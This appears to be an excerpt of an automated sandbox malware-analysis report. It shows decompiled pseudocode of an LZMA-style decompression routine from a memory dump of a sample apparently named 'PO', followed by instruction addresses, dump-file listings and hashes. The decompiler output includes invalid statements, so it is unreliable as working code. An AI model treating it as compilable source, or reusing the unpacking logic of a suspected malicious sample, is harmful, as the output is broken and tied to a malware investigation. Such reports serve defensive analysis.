												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406ae5
0x00406ae5
0x00406ae9
0x00406b0a
0x00406b11
0x00406b17
0x00406b1d
0x00406b2f
0x00406b35
0x00406b3a
0x00000000
0x00406aeb
0x00406af1
0x00406eb2
0x00406eb2
0x00406eb2
0x00406eb5
0x00406eb5
0x00406eb5
0x00406ebb
0x00406ec1
0x00406ec7
0x00406ee1
0x00406ee4
0x00406eea
0x00406ef5
0x00406ef7
0x00406ec9
0x00406ec9
0x00406ed8
0x00406edc
0x00406edc
0x00406f01
0x00000000
0x00000000
0x00406f03
0x00406f07
0x004070b6
0x004070cc
0x004070d4
0x004070db
0x004070dd
0x004070e4
0x004070e8
0x004070e8
0x00406f13
0x00406f1a
0x00406f22
0x00406f25
0x00406f28
0x00406f28
0x00406f2e
0x00406f2e
0x004066ca
0x004066ca
0x004066ca
0x004066d3
0x00000000
0x00000000
0x004066d9
0x00000000
0x004066e4
0x00000000
0x00000000
0x004066ed
0x004066f0
0x004066f3
0x004066f7
0x00000000
0x00000000
0x004066fd
0x00406700
0x00406702
0x00406703
0x00406706
0x00406708
0x00406709
0x0040670b
0x0040670e
0x00406713
0x00406718
0x00406721
0x00406734
0x00406737
0x00406743
0x0040676b
0x0040676d
0x0040677b
0x0040677b
0x0040677f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040676f
0x0040676f
0x00406772
0x00406773
0x00406773
0x00000000
0x0040676f
0x00406749
0x0040674e
0x0040674e
0x00406757
0x0040675f
0x00406762
0x00000000
0x00406768
0x00406768
0x00000000
0x00406768
0x00000000
0x00406785
0x00406785
0x00406789
0x00407035
0x00000000
0x00407035
0x00406792
0x004067a2
0x004067a5
0x004067a8
0x004067a8
0x004067a8
0x004067ab
0x004067af
0x00000000
0x00000000
0x004067b1
0x004067b7
0x004067e1
0x004067e7
0x004067ee
0x00000000
0x004067ee
0x004067bd
0x004067c0
0x004067c5
0x004067c5
0x004067d0
0x004067d8
0x004067db
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406820
0x00406826
0x00406829
0x00406836
0x0040683e
0x00000000
0x00000000
0x004067f5
0x004067f5
0x004067f9
0x00407044
0x00000000
0x00407044
0x00406805
0x00406810
0x00406810
0x00406810
0x00406813
0x00406816
0x00406819
0x0040681e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406ebb
0x00406ec1
0x00406ec7
0x00406ee1
0x00406ee4
0x00406eea
0x00406ef5
0x00406ef7
0x00406ec9
0x00406ec9
0x00406ed8
0x00406edc
0x00406edc
0x00406f01
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406846
0x00406848
0x0040684b
0x004068bc
0x004068bf
0x004068c2
0x004068c9
0x004068d3
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x0040684d
0x00406851
0x00406854
0x00406856
0x00406859
0x0040685c
0x0040685e
0x00406861
0x00406863
0x00406868
0x0040686b
0x0040686e
0x00406872
0x00406879
0x0040687c
0x00406883
0x00406887
0x0040688f
0x0040688f
0x0040688f
0x00406889
0x00406889
0x00406889
0x0040687e
0x0040687e
0x0040687e
0x00406893
0x00406896
0x004068b4
0x004068b6
0x00000000
0x00406898
0x00406898
0x0040689b
0x0040689e
0x004068a1
0x004068a3
0x004068a3
0x004068a3
0x004068a6
0x004068a9
0x004068ab
0x004068ac
0x004068af
0x00000000
0x004068af
0x00000000
0x00000000
0x00000000
0x00406b4f
0x00406b53
0x00406b76
0x00406b79
0x00406b7c
0x00406b86
0x00406b55
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b6b
0x00406b6e
0x00406b6e
0x00406eb2
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00000000
0x00406b92
0x00406b96
0x00000000
0x00000000
0x00406b9c
0x00406ba0
0x00000000
0x00000000
0x00406ba6
0x00406ba8
0x00406bac
0x00406bac
0x00406baf
0x00406bb3
0x00000000
0x00000000
0x00406c03
0x00406c07
0x00406c0e
0x00406c11
0x00406c14
0x00406c1e
0x00406eb2
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00406eb2
0x00406c09
0x00000000
0x00000000
0x00406c2a
0x00406c2e
0x00406c35
0x00406c38
0x00406c3b
0x00406c30
0x00406c30
0x00406c30
0x00406c3e
0x00406c41
0x00406c44
0x00406c44
0x00406c47
0x00406c4a
0x00406c4d
0x00406c4d
0x00406c50
0x00406c57
0x00406c5c
0x00000000
0x00000000
0x00406cea
0x00406cea
0x00406cee
0x0040708c
0x00000000
0x0040708c
0x00406cf4
0x00406cf7
0x00406cfa
0x00406cfe
0x00406d01
0x00406d07
0x00406d09
0x00406d09
0x00406d09
0x00406d0c
0x00406d0f
0x00000000
0x00000000
0x004068df
0x004068df
0x004068e3
0x00407050
0x00000000
0x00407050
0x004068e9
0x004068ec
0x004068ef
0x004068f3
0x004068f6
0x004068fc
0x004068fe
0x004068fe
0x004068fe
0x00406901
0x00406904
0x00406904
0x00406907
0x0040690a
0x00000000
0x00000000
0x00406910
0x00406916
0x00000000
0x00000000
0x0040691c
0x0040691c
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692d
0x00406930
0x00406932
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x0040694a
0x00406966
0x00406969
0x0040696c
0x0040696f
0x00406976
0x0040697a
0x0040697c
0x00406980
0x0040694c
0x0040694c
0x00406950
0x00406958
0x0040695d
0x0040695f
0x00406961
0x00406961
0x00406983
0x0040698a
0x0040698d
0x00000000
0x00406993
0x00000000
0x00406993
0x00000000
0x00406998
0x00406998
0x0040699c
0x0040705c
0x00000000
0x0040705c
0x004069a2
0x004069a5
0x004069a8
0x004069ac
0x004069af
0x004069b5
0x004069b7
0x004069b7
0x004069b7
0x004069ba
0x004069bd
0x004069bd
0x004069bd
0x004069c3
0x00000000
0x00000000
0x004069c5
0x004069c8
0x004069cb
0x004069ce
0x004069d1
0x004069d4
0x004069d7
0x004069da
0x004069dd
0x004069e0
0x004069e3
0x004069fb
0x004069fe
0x00406a01
0x00406a04
0x00406a04
0x00406a07
0x00406a0b
0x00406a0d
0x004069e5
0x004069e5
0x004069ed
0x004069f2
0x004069f4
0x004069f6
0x004069f6
0x00406a10
0x00406a17
0x00406a1a
0x00000000
0x00406a1c
0x00000000
0x00406a1c
0x00406a1a
0x00406a21
0x00406a21
0x00406a21
0x00406a21
0x00000000
0x00000000
0x00406a5c
0x00406a5c
0x00406a60
0x00407068
0x00000000
0x00407068
0x00406a66
0x00406a69
0x00406a6c
0x00406a70
0x00406a73
0x00406a79
0x00406a7b
0x00406a7b
0x00406a7b
0x00406a7e
0x00406a81
0x00406a81
0x00406a87
0x00406a25
0x00406a25
0x00406a28
0x00000000
0x00406a28
0x00406a89
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a9b
0x00406a9e
0x00406aa1
0x00406aa4
0x00406aa7
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406ac8
0x00406acb
0x00406acf
0x00406ad1
0x00406aa9
0x00406aa9
0x00406ab1
0x00406ab6
0x00406ab8
0x00406aba
0x00406aba
0x00406ad4
0x00406adb
0x00406ade
0x00000000
0x00406ae0
0x00000000
0x00406ae0
0x00000000
0x00406d6d
0x00406d6d
0x00406d71
0x00407098
0x00000000
0x00407098
0x00406d77
0x00406d7a
0x00406d7d
0x00406d81
0x00406d84
0x00406d8a
0x00406d8c
0x00406d8c
0x00406d8c
0x00406d8f
0x00000000
0x00000000
0x00406b3d
0x00406b3d
0x00406b40
0x00406eb2
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00000000
0x00406e7c
0x00406e80
0x00406ea2
0x00406ea5
0x00406eaf
0x00406eb2
0x00406eb2
0x00406eb2
0x00000000
0x00406eb2
0x00406eb2
0x00406e82
0x00406e85
0x00406e89
0x00406e8c
0x00406e8c
0x00406e8f
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f5b
0x00406f5b
0x00406f5b
0x00406f62
0x00406f69
0x00406f70
0x00406f70
0x00000000
0x00406f70
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4f
0x00406e93
0x00406e93
0x00406e96
0x00000000
0x00000000
0x0040702a
0x0040702d
0x00406f2e
0x00000000
0x00000000
0x00406c64
0x00406c66
0x00406c6d
0x00406c6e
0x00406c70
0x00406c73
0x00000000
0x00000000
0x00406c7b
0x00406c7e
0x00406c81
0x00406c83
0x00406c85
0x00406c85
0x00406c86
0x00406c89
0x00406c90
0x00406c93
0x00406ca1
0x00000000
0x00000000
0x00406f77
0x00406f77
0x00406f7a
0x00406f81
0x00000000
0x00000000
0x00406f86
0x00406f86
0x00406f8a
0x004070c2
0x00000000
0x004070c2
0x00406f90
0x00406f93
0x00406f96
0x00406f9a
0x00406f9d
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fab
0x00406fab
0x00406fab
0x00406fae
0x00406fae
0x00406fb2
0x00407012
0x00407015
0x0040701a
0x0040701b
0x0040701d
0x0040701f
0x00407022
0x00406f2e
0x00406f2e
0x00000000
0x00406f34
0x00406f2e
0x00406fb4
0x00406fba
0x00406fbd
0x00406fc0
0x00406fc3
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fcf
0x00406fd2
0x00406fd5
0x00406fee
0x00406ff1
0x00406ff4
0x00406ff7
0x00406ffb
0x00406ffd
0x00406ffd
0x00406ffe
0x00407001
0x00406fd7
0x00406fd7
0x00406fdf
0x00406fe4
0x00406fe6
0x00406fe9
0x00406fe9
0x00407004
0x0040700b
0x00000000
0x0040700d
0x00000000
0x0040700d
0x00000000
0x00406ca9
0x00406cac
0x00406ce2
0x00406e12
0x00406e12
0x00406e12
0x00406e12
0x00406e15
0x00406e15
0x00406e18
0x00406e1a
0x004070a4
0x00000000
0x004070a4
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2d
0x00406e30
0x00406e30
0x00406e30
0x00000000
0x00406e30
0x00406cae
0x00406cb0
0x00406cb2
0x00406cb4
0x00406cb7
0x00406cb8
0x00406cba
0x00406cbc
0x00406cbf
0x00406cc2
0x00406cd8
0x00406cdd
0x00406d15
0x00406d15
0x00406d19
0x00406d45
0x00406d47
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d59
0x00406d59
0x00406d5b
0x00406d5e
0x00406d65
0x00406d68
0x00406d95
0x00406d95
0x00406d98
0x00406d9b
0x00406e0f
0x00406e0f
0x00406e0f
0x00000000
0x00406e0f
0x00406d9d
0x00406da3
0x00406da6
0x00406da9
0x00406dac
0x00406daf
0x00406db2
0x00406db5
0x00406db8
0x00406dbb
0x00406dbe
0x00406dd7
0x00406dd9
0x00406ddc
0x00406ddd
0x00406de0
0x00406de2
0x00406de5
0x00406de7
0x00406de9
0x00406dec
0x00406dee
0x00406df1
0x00406df5
0x00406df7
0x00406df7
0x00406df8
0x00406dfb
0x00406dfe
0x00406dc0
0x00406dc0
0x00406dc8
0x00406dcd
0x00406dcf
0x00406dd2
0x00406dd2
0x00406e01
0x00406e08
0x00406d92
0x00406d92
0x00406d92
0x00406d92
0x00000000
0x00406e0a
0x00000000
0x00406e0a
0x00406e08
0x00406d1b
0x00406d1e
0x00406d20
0x00406d23
0x00406d26
0x00406d29
0x00406d2b
0x00406d2e
0x00406d31
0x00406d31
0x00406d34
0x00406d34
0x00406d37
0x00406d3e
0x00406d12
0x00406d12
0x00406d12
0x00406d12
0x00000000
0x00406d40
0x00000000
0x00406d40
0x00406d3e
0x00406cc4
0x00406cc7
0x00406cc9
0x00406ccc
0x00000000
0x00000000
0x00406a2b
0x00406a2b
0x00406a2f
0x00407074
0x00000000
0x00407074
0x00406a35
0x00406a38
0x00406a3b
0x00406a3e
0x00406a41
0x00406a44
0x00406a47
0x00406a49
0x00406a4c
0x00406a4f
0x00406a52
0x00406a54
0x00406a54
0x00406a54
0x00000000
0x00000000
0x00406bb6
0x00406bb6
0x00406bba
0x00407080
0x00000000
0x00407080
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bcb
0x00406bcb
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406bde
0x00406be0
0x00406be0
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bec
0x00406bec
0x00406bef
0x00406bf1
0x00406bf1
0x00000000
0x00000000
0x00406e33
0x00406e33
0x00406e33
0x00406e37
0x00000000
0x00000000
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e48
0x00406e48
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5b
0x00406e5d
0x00406e5d
0x00406e5d
0x00406e60
0x00406e63
0x00406e66
0x00406e69
0x00406e6c
0x00406e70
0x00406e72
0x00406e75
0x00000000
0x00406e77
0x00406bf4
0x00406bf4
0x00000000
0x00406bf4
0x00406e75
0x004070aa
0x00000000
0x00000000
0x004066d9
0x004070e1
0x004070e1
0x00000000
0x004070e1
0x00406f2e
0x00406eb5
0x00406eb2
0x00000000
0x00406ae9

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
Instruction ID: 7cecadd07089ef5f508d2048bcf4206a214b5fe31ba49bd0cdf53ec9cfb3ce0b
Opcode Fuzzy Hash: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
Instruction Fuzzy Hash: 35712175D04228CBDF28CFA8C844BADBBB1FB44305F15816AD806BB281D7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406C03 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C03() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004070E9))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
